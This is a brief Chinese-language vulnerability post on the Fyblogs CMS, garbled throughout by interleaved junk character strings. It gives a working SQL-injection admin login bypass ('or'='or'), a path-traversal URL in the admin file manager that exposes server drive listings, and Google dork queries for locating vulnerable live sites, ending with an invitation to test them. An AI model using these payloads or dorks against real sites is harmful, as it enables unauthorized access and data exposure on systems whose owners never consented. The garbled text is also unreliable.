漏洞类型: 未授权访问/权限绕过/ ^9 c7 ]5 Y" s: D" k% h8 W+ V
) a x' O7 m T! \# K
简要描述:
6 T1 }- I. q$ I4 S# ^; Y: r3 j Q" J* o5 d7 H
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!! y2 A8 }! h' N
7 m% J8 }% V* Q% X详细说明:8 i1 ^( `4 Y2 d8 ^4 S$ u$ S
4 h( X$ {* @8 w9 a
后台万能密码 'or'='or') `1 ^1 \) i/ o2 W
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!* E7 T3 T; U" ]7 m
admin/uploadfile.asp?currentFolder=/upfiles/../$ p( ^/ r& Z* c$ u3 I
. q# E+ Z1 _# w3 y1 k漏洞证明:
" ^4 V' {: |1 z0 [3 I" s, D" i$ m
谷歌:inurl:type.asp?id=1 新闻中心
( h5 Q' x6 n, {& A0 t或者 :inurl:download_ok.asp?
5 k! U3 _) p/ |6 p- p
9 u& l% A5 |3 @7 A可以测试) \3 `3 L V0 {- D" F5 ~+ |8 L8 V
$ F0 t- s1 u" Y T5 j1 h& r" n4 z
0 x/ @+ a: P* G( k# `0 P% D% }; \9 u |